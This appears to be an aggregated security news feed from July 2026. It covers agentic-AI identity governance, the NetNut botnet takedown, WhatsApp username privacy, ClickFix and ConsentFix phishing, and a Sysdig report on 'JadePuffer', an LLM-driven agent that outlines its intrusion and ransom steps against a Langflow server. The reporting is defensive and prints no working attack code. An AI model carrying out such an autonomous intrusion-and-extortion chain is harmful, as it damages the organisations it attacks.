While agentic AI can raise short-term security problems, Wilson sees the technology as a forcing function that will spur long-term improvements to organizations’ zero trust environments. “We’re at an inflection point where we’re going to have to do the hard things,” he says. “With human users, we’ve accepted that we’re not going to move as fast as we want, and we’re going to have to say no a lot. But this is a tidal wave.”

Wilson likens the rise of agentic AI to the debut of the iPhone (“but 10 times more potent”), noting that smartphones forced organizations to create security and governance practices for bring-your-own-device (BYOD) and remote work programs. “Before the iPhone, there was no such thing as BYOD,” he says. “It was very painful at first, but we would not have remote work if it wasn’t for the iPhone.”

“AI brings that same challenge,” Wilson says. Doing the hard things, he adds, means moving to zero standing privilege, issuing dynamic credentials at the moment of use rather than relying on long-lived secrets, and building security in rather than bolting it on. The goal is to keep the human “on the loop” rather than in it, supervising agents without slowing them down. “Some organizations are going to take some hard lumps, but I think we’re going to be more secure in the long run.”

To learn more, visit us here.

Identity: The operational control plane for agentic AI

csoonline Jul 6, 2026 · 16:39

Existing security controls weren’t designed for AI agents.

Static credentials and standing privileges aren’t sufficient for an emerging model where organizations need to rapidly authorize, limit, and revoke permissions from autonomous agents, sometimes more than once within a single workflow.

Agentic AI requires organizations to carefully consider how to govern agentic identity, agent-to-agent communication, secrets management, privileged access, and workforce identity.

Agentic identity

The first challenge is to establish a reliable identity for agents themselves.

The “how” here is still being hotly debated. Some organizations treat AI agents as another form of non-human identity, similar to service accounts or machine identities. Others argue that agents should be their own category, distinct from both human users and machine accounts.

In any case, agents need something like a “certificate” to give them an identity that can be recognized and governed across environments. This is especially important because, in most enterprises, agents will operate across multiple environments, including cloud platforms, on-premises systems, and SaaS applications. 

Agent-to-agent communication

Securing agentic AI requires organizations to limit not only which resources AI agents can access, but also which other access-enabled agents they can communicate with. This is often currently handled with Model Context Protocol (MCP) gateways, although this approach is largely giving way to the use of agentic mesh.

An agentic mesh is a distributed architecture where multiple specialized AI agents can discover one another, coordinate, and collaborate on tasks without a central controller. This approach lets organizations overlay intent-based communication rules via certificates, but also allows permissions to be revoked on demand.

Agentic secrets

Traditionally, secrets like passwords and API keys are managed via requests through IT service management platforms. But this mechanism doesn’t work for AI agents, which operate too quickly and across too many systems to rely on static credentials.

Instead, secrets should be generated dynamically, used for a specific purpose, and then retired when the task is complete. This approach can be compared to modern hotel key cards. Unlike the physical room keys of the past, a key card is issued for a specific stay, but after that, it becomes worthless to both legitimate users and malicious actors.

Privileged access

AI agents may start with the same permissions as a given human user, drawing on relevant business systems and data for context. However, as workflows get handed off from agent to agent, this privilege should not be passed along throughout the process. Rather, privileges should be whittled down at each stage until only a thin layer remains to authorize a specific execution step.

Workforce identity

Organizations already manage the identities of human workers, of course, but often these identities are handled differently across separate management platforms and sign-on tools. To support agentic AI, organizations must find ways to break through this fragmentation, ensure that worker identities are current, and translate workforce permissions correctly into agentic workflows.

A lifecycle approach to identity

These five areas should not be addressed in isolation. Rather, organizations should apply governance and observability across the identity lifecycle, ensuring that every agentic action can ultimately be traced back to approved access and permission levels.

The outcomes of this effort—including dynamic access, the principle of least privilege, strong identity, and clear auditability—are goals that many organizations have long been pursuing. The rise of agentic AI makes them more urgent than ever.

To learn more, visit us here.

Operationalizing Agentic AI: from assisted to autonomous

csoonline Jul 6, 2026 · 16:37

Ever since ChatGPT made its public debut nearly four years ago, governance and security have largely lagged behind AI adoption.

Eager to experiment with AI tools and find ways to improve their work and personal lives, users have uploaded corporate data, financial records, and even their own health information to large language models (LLMs). While this freewheeling activity presents obvious risks, many users and businesses have so far been spared from catastrophic consequences.

Stephen Wilson, field chief technology officer for HashiCorp, an IBM company, notes that most people are still using AI tools largely as “assistants,” with the technology only taking action at the direction of human users. But, as AI agents are given more ability to act on their own, the risk calculus is changing. And so far, Wilson says, security and governance practices aren’t keeping up.

“Right now, what’s happening is that organizations are starting to use AI tools as full partners but governing the tools the same way they did when they were only using them as assistants,” Wilson says. “When AI is an assistant, the user is very close to the execution, and they’re handing over API keys, social media credentials, and bank information. But now we’re starting to ask AI to do things on our behalf autonomously.”

As organizations move from assisted use cases toward more autonomous workflows, Wilson says, they need to mature their governance models across three common adoption patterns: AI as assistant, AI as an agent, and AI as operator.

AI as assistant

The most basic and widespread form of enterprise AI adoption is AI as an assistant. In this model, a human remains close to the work, using the technology to summarize information, draft content, generate code, and complete other discrete tasks. The user enters a prompt, evaluates the response, and decides what to do next.

Although humans remain close to the execution at this stage, activity is not free from risk. When users interact with AI assistants, they can easily bring sensitive data, credentials, or permissions with them into the workflow. A user with privileged access might paste an API key into a prompt or even ask an LLM to analyze confidential records.

“You need to have a very tight handoff from the human identity to the machine identity,” Wilson says. “You also need to be able to govern what that machine can access from a machine-to-service perspective, because if I get elevated privilege, it’s not hard to inject that privilege into the context window.”

At the assistant stage, organizations largely need to ensure that AI activity is governed by the same boundaries already established for users. But as AI moves from answering prompts to completing work, those governance boundaries must expand.

AI as an agent

At this stage, human users begin asking AI tools to complete certain tasks autonomously. For example, instead of going back and forth with an LLM to outline and draft a piece of content, a user might simply give an AI tool a set of inputs and basic instructions and then ask the tool to generate the piece on its own. In fact, the writing agent may even pass off the finished draft to an editing agent or other AI tools before coming back to a human user.

“When that happens, the governance controls and the identity and auditability have to go up because you’re moving the human out of the loop even more,” Wilson says. “With AI assistants, the human is still the initiator of the request that happens back and forth. But with AI as agent, you’re making a request and then just letting it run.”

At this stage, Wilson says, organizations must determine what level of access different agents need to complete certain tasks, as well as how to confer identity upon AI agents. “How do you manage the persona? How do you accelerate its ability to be more correct often? These are the things you have to think about as you start to move to AI as an agent.”

AI as operator

This is the stage where AI agents take on not just individual tasks but entire projects. Instead of prompting agentic tools to write and edit a single article, an organization might ask a team of AI agents to design and execute an entire marketing campaign.

“The human comes back in two or three hours and has the entire project, including where to publish, individual social media posts, and engagement strategies,” Wilson says. “The level of governance and identity and auditing have to increase as your level of oversight decreases.”

Wilson notes that it is important at this stage to establish strong governance not only around data access but also around accuracy. For example, if an AI agent creates social media content, the organization needs to know that the content uses approved messaging, moves through the right review process, and is published only through authorized channels.

This is a complex challenge because AI agents are probabilistic systems, while many enterprise workflows are deterministic. Before giving agents the power to complete these workflows, Wilson says, leaders must think carefully about where AI-generated work should end and controlled execution should begin.

The road ahead

Most organizations are only beginning to deploy agentic AI beyond the assistant stage, and Wilson notes that security leaders are still debating the right governance, identity, auditability, and observability models for these systems.

But the overarching governance demand is clear: As AI systems gain more autonomy, organizations must implement more rigorous controls. An AI assistant can be governed largely as an extension of the individual user. An AI agent must be governed as part of a team, with clear visibility into the work it performs and the systems it touches. And an AI operator must be governed as a business function, with controls that span data access, workflow execution, approvals, and audit trails.

“Your scope of governance, identity, and observability has to increase at the same rate as if you were moving from an individual to a team to an organization,” Wilson says.

To learn more, visit us here.

⚡ Weekly Recap: Proxy Botnets, Browser Ransomware, AI Agent Tricks, Fake PoC Malware and More

The Hacker News Jul 6, 2026 · 15:01
A streaming box should not need a threat model. Neither should a username field, a demo repo, a reset flow, or a browser permission prompt. That is the irritating part this week: the risky pieces were ordinary. Home devices became a routing cover. Clean code pulled dirt from a dependency. Identity shortcuts aged badly. AI systems trusted the wrong instructions. Same soft spot throughout: trust

Choose your WhatsApp username carefully

Malwarebytes Jul 6, 2026 · 14:51

Dutch consumer organization Consumentenbond has warned users to be careful when choosing their optional WhatsApp username.

Meta announced the introduction of usernames on June 29, 2026, and encouraged users to reserve their username now.

Meta offers this feature as:

“a major privacy feature designed to help you connect with new people without giving away your phone number.”

The new system gives users three practical choices: reuse an existing Facebook or Instagram name, create a separate unique WhatsApp username, or ignore the feature and keep using a phone number.

But there is an important catch. If you want to claim the same handle you already use on Instagram or Facebook, Meta requires you to link your accounts through Accounts Center. Meta says that adding WhatsApp to Accounts Center enables connected experiences and allows information to be shared across those linked accounts. It also makes it easier for people to connect your WhatsApp identity with your other public Meta profiles.

How matching usernames can hurt your privacy

Reusing your Instagram or Facebook handle on WhatsApp makes it easier to connect your identity across Meta’s apps. Even if your messages stay private, your presence across Meta’s ecosystem becomes more linkable, which can help Meta correlate profile data, behavior, and account history.

Meta’s own help pages say the Accounts Center is meant to manage connected experiences across Facebook, Instagram, WhatsApp, and other Meta products, and that adding WhatsApp enables information sharing across those connected accounts. The issue is not about message content, but the wider data picture around your account and how it is tied together.

And it creates a social-engineering risk. If someone can see or guess your Meta-style username, they may be able to connect your WhatsApp identity to your Instagram or Facebook profile and use information found on your social media accounts for impersonation or other targeted fraud.

Meta also accounted for that risk by reserving usernames for public figures, government entities, and “some variations” of those names, so only the legitimate owner can claim them. For example, I was unable to claim my favorite “MetallicaMVP” handle. But reportedly some usernames resembling prominent politicians, celebrities, business figures, and public institutions were still available to reserve.

Our advice

Hiding your phone number is a genuine privacy improvement. But if you reuse the same username across Meta’s apps, you could make it easier for both Meta and other people to connect those accounts.

The safest move is to choose a unique WhatsApp-only username rather than reusing your Facebook or Instagram handle.

If you decide to use a username, treat it like a public identifier: pick something hard to guess, avoid name patterns that map directly to other profiles, and enable any extra contact restrictions available in the app.

WhatsApp lets users restrict who can add them to groups, and it offers a separate option to control who can contact them via a username key or code.

Under Settings > Privacy you can restrict which WhatsApp users can see specific information about you.

Under Settings > Account > Username, you can control who can contact you by username by enabling a username key. Anyone trying to contact you for the first time must know both your username and that key. That should help to contain the social engineering attempts.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

NetNut botnet takes a hit. Don’t be part of the next one.

Malwarebytes Jul 6, 2026 · 13:52

In a joint operation, Google, the FBI, and other partners have dealt a significant blow to the residential proxy ecosystem by disrupting the NetNut (also tracked as Popa) botnet.

NetNut is a malicious service built on millions of hijacked consumer devices. NetNut marketed itself as a high-quality residential proxy provider, selling access to “real” home IP addresses for web data collection and other benign-sounding use cases.

The FBI’s definition of a residential proxy:

“A residential proxy is an intermediary server between individuals and websites they visit to make their connections appear to originate elsewhere. Legitimate IP addresses assigned by an Internet Service Provider (ISP) to consumers’ Internet of Things (IoT) devices, such as TV streaming devices, digital picture frames, smartphones, tablets, and routers are used to route traffic. Once an internet-connected device is compromised, the device’s IP address can be used by threat actors to mask their online illegal activity, making the consumer appear responsible.”

The most common method used to add devices to the NetNut network was to  trick users into installing “bandwidth sharing” or proxyware apps that promised payouts for “sharing your unused internet” but buried the true risks in fine print or skipped meaningful consent altogether. Less commonly, devices are sold pre-compromised through grey-market supply chains and shipped with malicious firmware or side-loaded apps.

Once enrolled, these devices could be used to relay password-spraying attacks, account takeover attempts, advertising fraud, and even Mirai-variant DDoS attacks.

The disruption focused on three levers: disabling Google accounts used for NetNut’s command-and-control (C2), sharing detailed indicators on NetNut’s SDKs and infrastructure with platforms and law enforcement, and using Google Play Protect to warn users and automatically disable apps that included NetNut code.

Reportedly, this has significantly disrupted the NetNut botnet, reducing the available pool of devices for the proxy operator by millions.

How to stay safe

A typical home user is unlikely to notice that their devices are part of the NetNut botnet, although they may experience slower performance, reduced internet speeds, faster battery drain, and additional wear and tear on affected devices.

After this blow, the botnet’s operators will likely try to rebuild their network by compromising new devices, or another botnet may take its place. So it’s important to stay vigilant. Some basic tips:

  • Be extremely wary of apps that pay you for unused bandwidth.
  • Stick to official app stores.
  • Check VPN and proxy permissions on your devices.
  • Favor reputable, Play Protect–certified vendors for connected devices.
  • Use an up-to-date, real-time anti-malware solution on devices that are eligible.
Malwarebytes blocks netnut.comMalwarebytes blocks netnut.com

Scammers know more about you than you think. 

Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in. 

Download for iOS → Download for Android → 

This AI agent autonomously hacked a network, adapted on the fly, and demanded a ransom

csoonline Jul 6, 2026 · 13:34

A fully autonomous AI agent conducted an end-to-end cyber intrusion and extortion campaign after exploiting a vulnerable Langflow server, demonstrating how large language models could accelerate ransomware operations, according to research published by Sysdig.

Sysdig detailed the operation in a research paper, saying the AI agent, dubbed JadePuffer, completed the entire intrusion chain, from initial access to database extortion, using an LLM to adapt its actions and execute more than 600 coordinated payloads.

“The Sysdig Threat Research Team (TRT) has captured what we assess to be the first documented case of agentic ransomware: a complete extortion operation driven end-to-end by a large language model (LLM),” Michael Clark, director of threat research at Sysdig, wrote in the paper.

Sysdig classifies JadePuffer as an agentic threat actor, meaning its attack capability was delivered by an AI agent rather than a human-driven toolkit.

A known flaw opens the door

According to Sysdig, JadePuffer gained initial access by exploiting CVE-2025-3248, an RCE vulnerability in an internet-facing Langflow instance, before pivoting to a production server running MySQL and Alibaba’s Nacos configuration platform.

The AI agent harvested credentials, established persistence, mapped internal services, and ultimately encrypted 1,342 Nacos configuration records before deleting the original tables and leaving behind a Bitcoin ransom demand.

Clark wrote that what distinguished the campaign was not the exploitation techniques, which largely relied on known vulnerabilities and misconfigurations, but the AI agent’s ability to make operational decisions throughout the intrusion.

Sysdig said the operation touched two separate machines: the compromised Langflow host that provided initial access, and a second production database server that was the agent’s true objective. All payloads, the researchers said, were delivered as Base64-encoded Python sent through the Langflow remote-code-execution endpoint.

“The most striking characteristic, however, was the LLM’s behavior,” he wrote. “JADEPUFFER’s own payloads were self-narrating. They contained natural language reasoning, target prioritization, and the kind of detailed annotations that human operators don’t often write but LLM-generated code produces reflexively.”

The paper cited multiple instances where the AI agent diagnosed failures and generated corrected payloads without human intervention. In one case, it recovered from a failed attempt to create an administrator account in Alibaba’s Nacos platform within 31 seconds. Sysdig said the behavior, along with self-narrating code and contextual reasoning, supported its assessment that the operation was LLM-driven.

Experts see evolution, not a revolution

Independent cybersecurity researcher and red teamer Vibhum Dubey said the campaign represents “an evolution in execution” rather than a fundamentally new ransomware technique.

“I see it more as an evolution in execution than a completely new ransomware technique,” Dubey said. “Attackers have automated reconnaissance, credential theft, and deployment for years. The difference is that an AI agent can connect those stages together and make decisions without waiting for a human operator.”

Adaptive decision making is the biggest concern, he said. “Traditional detections assume attackers follow fairly predictable paths. An AI agent can quickly change tactics if something is blocked, making every intrusion look slightly different. I’m less worried about the encryption stage than the quiet phase beforehand, where the agent maps identities, privileges, and trust relationships while avoiding detection.”

Rather than focusing on individual tools, defenders should prioritize detecting attacker behavior, including suspicious identity activity, privilege escalation, abnormal authentication patterns, and unusual sequences of actions across systems, Dubey said.

Although AI lowers the operational barrier for ransomware campaigns, it does not replace experienced attackers, he added. “Where AI makes a difference is helping less experienced operators chain together post-exploitation activities more effectively. Defenders should assume future intrusions will move faster and require less hands-on interaction from the attacker.”

Behavioral detection remains key

Autonomous AI agents capable of independently executing multiple stages of an attack represent “an evolution rather than a revolution,” said Prashant Sharma, cybersecurity consultant at Cyble.

“AI-assisted techniques have been in use for some time, but the emergence of autonomous agents capable of independently executing multiple stages of an attack could substantially increase the speed, scale, and adaptability of ransomware operations,” Sharma said.

He said threat actors are already using AI to improve phishing, malware development, reconnaissance, and social engineering, and he expects autonomous capabilities to become more common as the technology matures.

For enterprise defenders, however, the security priorities remain largely unchanged.

“Modern EDR, XDR, and SOC platforms are built to flag malicious behavior rather than the underlying technology driving it,” Sharma said. “Whether an attack is carried out manually or orchestrated by an AI agent, actions such as credential abuse, privilege escalation, lateral movement, data exfiltration, and ransomware deployment still leave detectable behavioral traces.”

How to Evaluate an AI SOC Platform in 2026: 6 Capabilities That Separate Leaders from Bolt-On AI solutions

The Hacker News Jul 6, 2026 · 13:30
Building a shortlist for an AI SOC evaluation can be tough. SIEM, SOAR, and pureplay AI SOC vendors are all saying the same thing. But behind the identical label sit very different products, from chat assistants bolted onto a legacy SIEM to agent platforms that run detection, triage, investigation, and response on their own data foundation. Whether a platform will materially change outcomes for

Suspected China-Nexus Hackers Use Fake Indian Tax Filing Utility to Deploy DcRAT

The Hacker News Jul 6, 2026 · 12:58
A suspected China-nexus threat activity cluster has been observed targeting Indian taxpayers, tax professionals, and corporate finance teams to deliver a remote access trojan designed to steal sensitive data from compromised hosts. The multi-stage campaign, codenamed Operation DragonReturn by Seqrite Labs, involves sending spear-phishing emails impersonating the Income Tax Department of India.

Single points of failure fail. The SaaS layer is not an exception

csoonline Jul 6, 2026 · 12:00

Higher education has consolidated its entire academic operation into a handful of massive SaaS platforms. The LMS manages instruction, grading and communication. The SIS owns enrollment, records and financial aid. Identity and productivity live in a small number of cloud providers. These are not peripheral tools — they are the operational infrastructure of the institution. As IT stewards, we manage platforms we do not own, cannot restore ourselves and cannot directly control — which makes contingency planning not optional, but fundamental to the role.

The contracts are in place. The SLAs are signed. The compliance certifications are current. None of that matters to a student who cannot reach her instructor three days before finals. None of it matters to a faculty member who has no roster, no grade book and no way to document the work his students submitted before the platform went dark. SLAs govern vendor response timelines. Keeping academic operations running during that response window is IT’s responsibility.

The disruption hit during finals week 2026, and I was doing what every CIO in higher education was doing — monitoring. A major learning management system had been breached. The disruption spread fast. Finals were canceled. Exams were postponed. Students and staff were stranded without access to coursework, rosters or grade books. The costs — in academic disruption, extended contracts, emergency response — were substantial and widely reported. My institution was not directly impacted. But watching peer institutions in my own state go dark during the highest-stakes moment of the academic calendar was not reassuring. It was a confirmation of something I had been thinking about for a long time.

The disruption proved something IT professionals have relearned in every decade of their careers. Mark Twain observed that history does not repeat itself, but it does rhyme. This is a verse we have heard before: Dependence on a single point of failure, without a tested contingency plan, is not a strategy — it is a risk that has simply not yet been called. Whether the failure comes from a cyberattack, a vendor outage, an infrastructure collapse or a cloud provider’s bad deployment, the result is the same. The institution stops. And no SLA, contract or compliance certification prevents that moment from arriving.

Vigilance is not optional. Technologies are evolving faster than any IT team can fully anticipate. New platforms, new integrations, new dependencies emerge constantly — and with each one comes a new potential failure point. That is not an argument against adopting new technology. It is an argument for the one principle that never becomes obsolete: Reliance on any single critical system, whether it is a connectivity provider, an identity platform or a SaaS solution, is a proven strategy for failure. The question is never whether that system will fail. The question is whether the institution is prepared when it does.

Single points of failure fail — inevitably, and at the worst possible time. IT professionals have known this for thirty years. The SaaS layer is not exempt.

This is not a new lesson. Azure has gone down. AWS has failed. Google Workspace has had outages that took organizations dark globally. No campus runs a single ISP connection — we provision redundant circuits, preferably from independent providers, because we learned long ago that the connection will sometimes fail and the institution cannot afford to stop when it does. Financial services, government and multinational enterprises applied that same logic to every dependency in their stack. Their response to platform risk was not to demand better SLAs. It was to architect around the dependency. Redundancy. Failover. Independent continuity capability. The massive disruptions from Canvas demonstrate that effective contingency solutions for these critical platforms have not kept pace with our dependence on them. We cannot get fooled again.

That omission is what made the 2026 attack so damaging. Not the sophistication of the breach — the entry point was a peripheral free-tier environment that wasn’t even within the vendor’s primary certification scope. The damage was catastrophic because institutions had no fallback. Faculty had no rosters. Administrators had no enrollment data. There was no continuity layer. A single point of failure, at institutional scale, with no plan for when it fails.

And now the economics have shifted in the worst possible direction. PowerSchool paid a ransom in December 2024 after attackers stole data on 60 million students — and was re-extorted anyway, with individual school districts receiving separate demands months later using the same stolen data. Instructure’s CEO publicly confirmed the extortion payment. Anyone who has paid a ransom only to be hit a second time at double the cost can tell you — paying the attackers resolves nothing and instead invites more attacks. The sector has now proven twice, publicly, and at scale, that it will pay. That changes the threat calculus entirely. Higher education stops being a target of opportunity and becomes a target of strategy. Criminal groups share that intelligence. Banner serves over 1,400 institutions. Blackboard reaches tens of millions of users across thousands of campuses. Every major higher education SaaS platform is now on active threat actor priority lists — not because they are newly vulnerable, but because the sector has proven it will pay, that academic calendar pressure creates maximum leverage, and that IT has not yet built the operational alternative that our dependence on these platforms demands — and therefore the failure is ours to own, especially if we allow it to happen a second time.

The sector has proven it will pay. Every ransomware group operating today just received the same market signal. What follows is not unpredictable — it is documented, underway and aimed directly at the platforms carrying your institution’s academic operations.

As a CIO, my approach to this is not a spreadsheet or a stack of printed reports. IT is responsible for identifying critical failure points and countering them — that is not optional; it is the job. Accepting failure as inevitable without a mitigation strategy is not viable. Redundancy and continuity solutions are standard practice everywhere else in our infrastructure. There was no reason the SaaS layer should be different.

A leader’s first job isn’t to be right — it’s to be responsible.

The solution I implemented is a secure, read-only, centralized repository — a continuity strategy that ensures students, staff and faculty can continue to function whether the issue is a power outage, a cyberattack or a SaaS platform going dark. It is not a replacement for Canvas or Banner. It is the independent fallback that allows the institution to keep operating while the primary system is restored. I have learned the hard way that accepting failure without a plan is not a posture any CIO can defend.

Watching the frustration across the industry during and after the 2026 attack — institutions paralyzed, peer CIOs improvising, faculty working from personal spreadsheets, boards asking questions no one could answer — the logic of extending this capability to other institutions became unavoidable. The solution is not complex. The architecture is straightforward. The discipline behind it is thirty years old. The discipline is established. The responsibility to apply it is our field of expertise in IT.

To be precise about scope: An ACR does not prevent vendor breaches, replace cyber insurance or remove notification obligations. When an incident hits, legal counsel, security teams and institutional leadership still manage the response. What the ACR changes is what they have to work with — a governed, auditable record of what data was accessed, what manual actions were taken and how operations continued while the vendor worked to restore service.

Redundancy, disaster recovery, continuity of operations — the discipline is not new. The SaaS platforms carrying academic operations deserve the same standard we hold everywhere else.

The solution to this problem exists. A SaaS third-party continuity of operations strategy requires an independent data layer — one the institution controls, synchronized on a regular scheduled cycle from source systems, and accessible when those systems are not. Platform-agnostic across Canvas, Banner, Blackboard and PowerSchool. Read-only by design. Auditable by requirement. Independent by architecture. That last word is the one that matters — independent of the platforms whose availability you cannot guarantee.

Every CIO in higher education knows what a single point of failure looks like. Every one of us has built around them at every other layer. Servers, networks, data centers — we do not accept the single-point risk, and we do not wait for the failure to motivate the fix. The SaaS layer is not an exception.

The question is not whether your institution will face it. The question is whether you will have a continuity strategy in place when it arrives — or be explaining to your board why you did not.

Leaders don’t rent accountability — they own it outright.

This article is published as part of the Foundry Expert Contributor Network.
Want to join?

AI isn’t closing the skills gap — it’s exposing the validation gap

csoonline Jul 6, 2026 · 11:00

If you wanted to become a basketball star, how would you get started? You wouldn’t read a book on basketball and take an online course. You’d set up a hoop in your driveway, join a local team to train, and play in real matches. So why do we expect cybersecurity professionals to learn their skills from theory and static training?

The cybersecurity industry talks constantly about the “skills gap.” The recent World Economic Forum’s Global Cybersecurity Outlook report revealed skills and budgets were significant blockers to achieving cyber resilience. However, I argue that we don’t have a skills gap; we have a validation gap.

The “skills gap” gets a lot of airtime in cybersecurity industry discourse, but what are we really talking about when we talk about a skills gap? It’s not about staffing; how can we have both a skills gap and a graduate unemployment problem? “AI” is the lazy explanation (is there anything anyone hates more than hearing that their job could be replaced by AI?) But if AI really is the explanation, why are we still experiencing breaches and fixating on a supposed lack of skills in the cybersecurity workforce?

The reality is that we don’t yet fully trust AI with our most critical security concerns, and for good reason. Few people would dispute that there are serious production risks in relying on AI and most wouldn’t actually use it to replace an experienced security analyst. While comparatively fewer organizations have reported serious breaches of AI models or applications, many are favoring rapid-scale deployments of AI technologies over establishing robust governance structures. Data from IBM suggests that, of 600 organizations polled globally between March 2024 and February 2025, 13% reported breaches of AI models or applications. More worrisome, 8% had no idea whether or not they had been compromised, and 63% of breached organizations either lacked AI governance policies or were developing them at the time of the reported incident. Despite these risks — and the significant financial damage they can cause — only 49% of organizations planned to invest in additional security measures in 2025, compared to 63% in 2024.

You can’t hire or tool your way out of the skills gap. You have to build your way out. The industry keeps asking, “How do we close the cyber skills gap?” The better question is, how do we prove readiness before the fight begins? That is the real challenge emerging in cybersecurity today.

This is more challenging when we need skills and expertise that just don’t exist yet. AI poses new threats to combat, from the development of more insecure software to the exploitation of models to do things they weren’t designed for to attackers weaponizing AI for more efficient attacks. No one was preparing to respond to these threats five years ago, so these skills need to be developed in real time. Even the most advanced training programs cannot hope to match the pace and scale of the vulnerabilities posed by AI and the increasingly broad attack surface it presents to potential threat actors. Relying on outdated training modalities is practically an invitation to attackers seeking to compromise critical systems, yet many organizations fail to recognize this as the systemic vulnerability it is.

Traditional upskilling is flawed and wholly impractical for the present risk environment. Organizations are shelling out tens of thousands per employee on courses, certifications, and boot camps, but certifications simply cannot keep up with the pace of technological change and the evolution of attacker tactics and techniques. Security professionals need continuous hands-on experience that represents the actual attack surfaces of their organizations. How they apply their skills in real-world scenarios is a big part of what’s missing; even the most rigorous theoretical exercises cannot replicate the experience of combatting an intrusion event in real time or identify potential weaknesses in SOC response protocols.

Our industry has traditionally seen technology as the answer. More tools and more alerts feel like we’re getting somewhere, but all it really leads to is teams that are fatigued and burned out on noise. When the main source of breaches remains human failure, we’re not going to tip the scales unless we invest in the people on the front line. Dynamic cyber ranges are the difference between learning a skill in theory and learning it in context.

A truly effective upskilling cyber range needs an AI Proving Ground, with a high degree of customization and fidelity, as well as in-depth post-exercise analysis, to nurture and retain effective talent with the skills and experience to combat increasingly sophisticated threats.

  • High degree of customization. Replicate your real production environment and tech stack and introduce panic-inducing live-fire exercises. This gives employees invaluable insight into how they’ll react in a real-life scenario. Does everyone have the right context and information to make quick decisions that will protect the business? Replicating a real production environment also allows for testing integration flows between security and IT tools to validate how they work together.
  • Post-exercise analysis. It’s not enough to run tests if you can’t analyze the outcomes to make improvements. This data is also particularly useful as execs are pushing for tech consolidation by proving the need to retain budget or secure additional resources for tools and features. Cyber ranges can also make detailed recommendations based on best practices and support and identify specific business cases for additional investment.
  • Nurture talent. How do you take a tier 1 SOC analyst and turn them into a tier 3? While AI might be able to perform the role of a junior analyst, you need a pipeline of talent to become that high-performing individual who could be the difference between spotting an unusual indicator of compromise or allowing an attacker to gain further access into critical systems. It’s faster and more cost-effective to teach someone over time than hunt out the top performer to hire into the organization. Nurturing and investing in existing talent also becomes a significant competitive advantage over time.

For overstretched teams, on-the-job training might feel onerous, but the benefits are considerable. You really can see 10X returns on your investment. Some of our customers have saved upward of $400,000 in training expenses and made their organizations significantly more resilient to novel threats. The key is to not see practical, hands-on training as an annual event or one-off investment, but to employ a continuous platform that accurately reflects the risks faced by your organization and becomes part of your operating model and broader security culture.

I don’t know about you, but working in a team environment feels far more rewarding than studying in a classroom environment. Retain your top talent by validating their skills and allowing them to add to their resumes in a way that feels natural and instinctive.

This article is published as part of the Foundry Expert Contributor Network.
Want to join?

New TrojPix Attack Leaks Data From Air-Gapped Systems via Video Cable Emissions

The Hacker News Jul 6, 2026 · 10:50
Researchers at Shandong University have shown a fast new way to pull data off computers that are cut off from every network. The technique, called TrojPix, tweaks on-screen pixels in ways the eye cannot see, so that the video cable carrying them radiates a faint radio signal a nearby receiver can decode. But TrojPix works only once malware is already on the target machine, so it

A week in security (June 29 – July 5)

Malwarebytes Jul 6, 2026 · 09:14

Verified X ad spreads Mac malware, while ConsentFix steals Microsoft accounts

Malwarebytes Jul 3, 2026 · 15:30

Cybercriminals are finding new ways to trick people into compromising their own devices and accounts. One campaign used a sponsored ad on X to target Mac users, while another technique, dubbed ConsentFix, steals Microsoft 365 accounts without installing malware.

Verified X account used in Mac ClickFix attack

Researchers have discovered a ClickFix-style attack running as a sponsored advertisement on X. The ad was posted from a verified account, adding an extra layer of credibility to the scam.

ClickFix campaigns use convincing lures—historically fake “human verification” screens, and now a fake download for DynamicLake, a legitimate macOS utility that turns your MacBook’s notch into an unofficial but functional version of Apple’s Dynamic Island. This type of attack requires the user to paste a command from the clipboard, making it depend heavily on user interaction.

Fake ad for DynamicLake

Image courtesy of Jamf

In reality, people who clicked the link were redirected to the lookalike domain dynamicmacisland[.]com, where they were instructed to open Terminal and paste installation commands that silently installed malware.

The campaign combines three worrying trends: ClickFix-style social engineering using Terminal commands, lookalike domains that mimic trusted Mac apps, and paid advertising infrastructure used to scale attacks to a large audience.

The malware reportedly delivers several variants of the Atomic Stealer infostealer.  

This pattern mirrors previous cases where Google Ads promoted fake software installers, including malicious sponsored listings that delivered malware when users searched for trusted developer tools. The lesson is clear: paid placement and verification badges are no guarantee of safety, especially when attackers deliberately design campaigns to evade automated screening.

The campaign abused X’s advertising platform, with the malicious ad appearing under a verified account. The researchers reported the advertisement to X and contacted the account owner. The ad appears to have since been removed.

ConsentFix steals accounts instead of installing malware

Windows users are also being warned about the next generation of ClickFix attacks, called ConsentFix.

ConsentFix is different because ,where ClickFix turns you into the installer, ConsentFix turns you into the identity provider. Instead of tricking you into running malware, it uses social engineering to get you to hand over your cloud login tokens through the browser without ever asking you to run malware or type your password.

“It can start with something as mundane as dragging a link into your browser. Three seconds later, a threat actor has the tokens needed to take over your Microsoft 365 account, and you never did anything that traditional security awareness training would flag.”

For example, a phishing email may arrive containing a link, often hosted on trusted platforms such as Dropbox. Sometimes it’s protected with a password, which also makes it harder for security tools to inspect.

If the target clicks on the link, they’ll see what looks like a standard Microsoft sign-in page and be asked to complete the process by dragging a localhost callback link into the browser.

How the ConsentFix trap looksHow the ConsentFix trap looks

That’s when the trap closes. Without realizing it, the victim hands over session tokens to the attacker, giving them access to email and other Microsoft 365 services without needing a password or completing multi-factor authentication (MFA).

The method has reportedly been shared on a Russian cybercrime forum, making it easy enough for less experienced cybercriminals to steal Microsoft 365 accounts.

How to stay safe

The best protection is knowing these attacks exist and recognizing what they look like. So keep reading our blog. But there’s more you can do:

  • Don’t trust links that arrive unexpectedly—whether by email, text message, social media, or even through verified accounts or sponsored search results.
  • Think things through before following instructions that seem unusual or that you don’t fully understand.
  • When filling out credentials, always check the address in the browser bar. Is that the one you expected? If not, stop.
  • Use an up-to-date, real-time anti-malware solution with web protection.

Pro tip: Did you know the free Malwarebytes Browser Guard browser extension protects you against malicious websites and ClickFix attacks? It also blocks ads and trackers, so that’s a bonus.

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

FBI Seizes NetNut Proxy Platform, Popa Botnet

Krebs on Security Jul 2, 2026 · 21:27

The Federal Bureau of Investigation (FBI) said today it worked with industry partners to seize hundreds of domains associated with NetNut, a sprawling residential proxy service operated by the publicly-traded Israeli company Alarum Technologies [NASDAQ: ALAR]. The action comes roughly two weeks after KrebsOnSecurity published findings from multiple security firms connecting NetNut to the Popa botnet, a collection of at least two million devices that have been compromised by malicious software with little or no consent from victims.

